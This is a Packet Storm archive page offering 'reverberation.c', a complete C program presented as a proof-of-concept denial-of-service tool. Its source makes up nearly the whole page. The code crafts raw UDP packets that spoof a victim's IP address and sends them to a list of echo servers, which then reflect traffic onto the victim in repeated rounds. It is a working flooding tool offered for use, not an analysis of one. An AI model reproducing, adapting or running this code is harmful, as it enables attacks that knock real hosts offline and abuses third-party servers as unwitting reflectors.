exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Reverberation UDP Echo Denial Of Service Tool

Reverberation UDP Echo Denial Of Service Tool
Posted Mar 9, 2010
Authored by l0om | Site excluded.org

Reverberation is a proof of concept denial of service tool that makes use of UDP echo servers.

tags | denial of service, udp, proof of concept
SHA-256 | 14699b1e6d5e32f01ee4e0376b52b221fce84d7267f7896bf740da0191cc46ba

Reverberation UDP Echo Denial Of Service Tool

Change Mirror Download
/* 
reverberation.c - written by l0om
reverberation - echo, nachklang, widerhall

this program has been written to prove the possibility of taking down hosts with DDoS UDP Echo servers.
an attacker needs a service that responds UDP messages on every unexpected message or simply something like
an active UDP echo server. those can ge taken out with spoofed UDP packets to a list of other UDP echo
servers what will end in an DDoS attack.

U may scan for UDP echo servers with nmap or hping.

-f: next argument has to be the ECHO DDoS-Zombie file
-v: verbose mode
-r: next arg the rounds to go
-t: next arg the time to wait after a round of sending packets
-P: next arg vulnerable port of victims host

Notes:
the echo-zombie file has to look like this:
1.2.3.4
2.3.4.5
3.4.5.6
[...]
the default vul port is 7 for echo

*/

#include <stdio.h>
#include <string.h>
#include <signal.h>
#include <netdb.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <unistd.h>
#include <sys/time.h>
#include <sys/types.h>
#include <errno.h>
#define __FAVOR_BSD
#include <netinet/ip.h>
#include <netinet/udp.h>

#define ECHOPORT 7
#define ECHOSTR "the quick brown fox jumps over the lazy dog" //stupid shit :/

ssize_t udpsend(u_int saddr, u_int daddr, unsigned short sport, unsigned short dport, char *data, unsigned short datalen);
unsigned short in_cksum(unsigned short *ptr, int nbytes);
void help(char *p);

/* define the pseudohdr */

struct pseudohdr { /* for creating the checksums */
unsigned long saddr;
unsigned long daddr;
char useless;
unsigned char protocol;
unsigned short length;
};

int verbose;

int main(int argc, char **argv)
{
int i, rounds=1, sleeptime = 0, vulport = ECHOPORT;
char buf[512], *filename, *dest = NULL, *payload = ECHOSTR;
FILE *echozombies = NULL;

for(i = 1; i < argc; i++)
if(argv[i][0] == '-')
switch(argv[i][1])
{
case 'f':
filename = (char *)malloc(strlen(argv[++i])+1);
if(filename == NULL) {
perror("filename");
return 1;
}
strcpy(filename,argv[i]);
echozombies = fopen(filename, "r");
if(echozombies == NULL) {
perror("fopen");
return 1;
}
break;
case 'r':
rounds = atoi(argv[++i]);
if(errno == EINVAL) {
printf("illegal count of rounds >>%s<<\n",argv[i]);
return -1;
}
break;
case 'v':
verbose = 1;
break;
case 't':
sleeptime = atoi(argv[++i]);
if(errno == EINVAL) {
printf("illegal seconds to sleep >>%s<<\n",argv[i]);
return -1;
}
break;
case 'P':
vulport = atoi(argv[++i]);
if(errno == EINVAL) {
printf("illegal port to flood >>%s<<\n",argv[i]);
return -1;
}
break;
case 'p':
payload = (char *)malloc(strlen(argv[++i])+1); //memory leek
if(payload == NULL) {
perror("malloc");
return -1;
}
strcpy(payload,argv[i]);
break;
default:
printf(">>%s<< unknown option\n",argv[i]);
return 1;
}
else dest = argv[i];

if(echozombies == NULL || dest == NULL) {
help(argv[0]);
return -1;
}

printf("action starts\n");
while(rounds)
{
printf("%d rounds to go...\n",rounds);
while(!feof(echozombies))
{
if(fgets(buf, sizeof(buf), echozombies) != NULL)
{
buf[strlen(buf)-1] = '\0';
printf("sending echo packet: src ip:%s dst ip:%s\n",dest, buf); //dest=victim buf=zombie
if(udpsend(inet_addr(dest), inet_addr(buf), vulport, 7, payload, strlen(payload)) == 0)
{
printf("something went wrong while sending - EXIT\n");
fclose(echozombies);
free(filename);
return 0;
}
}
}
rounds--;
fseek(echozombies, 0L, SEEK_SET);
printf("time of reverberation...\n");
sleep(sleeptime);
}
fclose(echozombies);
free(filename);
return 0;
}


void help(char *p)
{
printf("%s [options, <-f zombiefile>] <dest-host-ip>\n",p);
printf("options:\n");
printf("-f: next argument has to be the ECHO DDoS-Zombie file\n");
printf("-v: verbose mode\n");
printf("-r: next arg the rounds to go\n");
printf("-t: next arg the time to wait after one round of sending packets (secs)\n");
printf("-P: next arg vulnerable port of victims host\n");
}

ssize_t udpsend(u_int saddr, u_int daddr, unsigned short sport, unsigned short dport, char *data, unsigned short datalen)
{
struct sockaddr_in servaddr;
struct iphdr *ip;
struct udphdr *udp;
struct pseudohdr *pseudo;
char packet[sizeof(struct iphdr)+sizeof(struct udphdr)+datalen];
int nbytes, sockfd, on = 1;

sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if(sockfd < 0) {
fprintf(stderr,"cannt creat socket\n");
return(0);
}

if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) == -1) {
fprintf(stderr, "cannot setsockopt\n");
return(0);
}

memset(packet, 0x00, sizeof(packet));
memcpy(packet+sizeof(struct iphdr)+sizeof(struct udphdr), data, datalen);

servaddr.sin_addr.s_addr = daddr;
servaddr.sin_port = htons(dport);
servaddr.sin_family = AF_INET;

ip = (struct iphdr *)packet;
udp = (struct udphdr *)(packet + sizeof(struct iphdr));
pseudo = (struct pseudohdr *)(packet + sizeof(struct iphdr) - sizeof(struct pseudohdr));


udp->uh_sport = htons(sport);
udp->uh_dport = htons(dport);
udp->uh_sum = 0;
udp->uh_ulen = htons(sizeof(struct udphdr)+datalen);

pseudo->saddr = saddr;
pseudo->daddr = daddr;
pseudo->useless = 0;
pseudo->protocol = IPPROTO_UDP;
pseudo->length = udp->uh_ulen;

udp->uh_sum = in_cksum((u_short *)pseudo,sizeof(struct udphdr)+sizeof(struct pseudohdr)+datalen);

ip->ihl = 5;
ip->version = 4;
ip->tos = 0x10;
ip->tot_len = sizeof(packet);
ip->frag_off = 0;
ip->ttl = 69;
ip->protocol = IPPROTO_UDP;
ip->check = 0;
ip->saddr = saddr;
ip->daddr = daddr;
nbytes = sendto(sockfd, packet, ip->tot_len, 0, (struct sockaddr *)&servaddr, sizeof(servaddr));

close(sockfd);
return(nbytes);
}


unsigned short in_cksum(unsigned short *ptr, int nbytes)
{
register long sum;
u_short oddbyte;
register u_short answer;

sum = 0;
while(nbytes > 1)
{
sum += *ptr++;
nbytes -= 2;
}

if(nbytes == 1)
{
oddbyte = 0;
*((u_char *) &oddbyte) = *(u_char *)ptr;
sum += oddbyte;
}
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return(answer);
}

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close